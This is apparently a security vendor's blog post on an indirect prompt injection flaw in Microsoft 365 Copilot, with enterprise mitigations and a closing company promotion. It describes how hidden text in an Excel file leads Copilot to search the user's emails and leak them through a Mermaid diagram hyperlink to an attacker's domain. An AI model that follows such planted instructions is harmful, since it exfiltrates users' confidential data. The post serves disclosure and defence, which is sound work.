A newly discovered vulnerability in Microsoft 365 Copilot allows attackers to extract sensitive tenant data-such as recent emails-via an indirect prompt injection attack embedded within everyday Office documents. This incident highlights the growing complexity of securing AI-powered systems and the urgent need to treat them like any other enterprise attack surface.
How the Attack Works
- Attackers embed hidden instructions in an Office spreadsheet-commonly an Excel file-using white text or diagrams. The victim asks the assistant to “summarize this document,” unknowingly triggering malicious logic.
- The hidden instructions instruct Copilot to invoke email search tools, retrieve sensitive content, and embed it in a rendered Mermaid diagram with a hyperlink pointing to an attacker-controlled domain.
- When the user clicks the link (which appears benign), the stolen data is transmitted to the attacker’s server. Because the user action looks normal and the AI assistant did the work, the exfiltration remains largely invisible.
- Microsoft validated the issue and issued a patch in September 2025 to remove interactive hyperlinks from diagram renderings and harden prompt interpretation.
Why This Matters for Enterprises
AI assistants like Copilot are increasingly embedded in productivity workflows, meaning a compromise can bypass traditional safeguards. Here’s why this vulnerability matters across sectors:
- Data exfiltration without malware: The exploit doesn’t rely on payloads or code execution; it misuses natural language processing features.
- Trusted context abuse: The victim’s own request triggers the exfiltration, making it difficult to detect as malicious.
- Broad industry exposure: Organizations in industries handling sensitive information—finance, healthcare, retail, manufacturing, government—are especially vulnerable. The attacker’s ability to pull emails or document content undermines both confidentiality and compliance.
- Expanding AI attack surface: As AI tools become deeply integrated, vulnerabilities like this become new high-stakes failure points alongside networks and endpoints.
Recommended Actions for Organizations
- Patch immediately – Ensure Copilot and related AI integrations are updated with the latest security fixes.
- Restrict AI document ingestion – Limit which documents the AI assistant can access and apply strict scanning of embedded metadata, diagrams, or hidden text.
- Monitor exfiltration channels – Track outgoing links generated by AI assistants, and alert on unusual redirect patterns or external requests triggered via diagrams or hyperlinks.
- Enforce strict MFA and least privilege – Especially for document-sharing, AI callbacks, and productivity tools that access sensitive data.
- Audit AI assistant usage – Review logs of assistant-driven actions, track document access context, and investigate any anomalies where AI was used for data-heavy requests.
- Train employees on AI risks – Update security awareness programs to include risks from AI assistants, hidden prompts, and malicious document formats.
- Treat AI as part of the attack surface – Incorporate AI assistant governance into your threat model and incident response planning.
Conclusion
This Copilot prompt injection vulnerability underscores a pivotal shift: attackers are targeting AI systems’ logic and workflows rather than just endpoints or networks. For organizations, the take-away is clear—AI assistants are neither benign nor peripheral. They handle sensitive data, make decisions, and now emerge as worthy adversarial targets. Securing these systems demands the same rigor applied to systems, networks, and applications.
About COE Security
COE Security partners with organizations in financial services, healthcare, retail, manufacturing, and government to secure AI-powered systems and ensure compliance. Our offerings include:
- AI-enhanced threat detection and real-time monitoring
- Data governance aligned with GDPR, HIPAA, and PCI DSS
- Secure model validation to guard against adversarial attacks
- Customized training to embed AI security best practices
- Penetration Testing (Mobile, Web, AI, Product, IoT, Network & Cloud)
- Secure Software Development Consulting (SSDLC)
- Customized CyberSecurity Services
In response to threats like prompt injection attacks on AI assistants, we also provide AI risk-assessment services, prompt-governance frameworks, behavioral monitoring of AI workflows, and document-ingestion hardening for RAG systems.
Follow COE Security on LinkedIn for ongoing insights into safe, compliant AI adoption and to stay updated and cyber safe.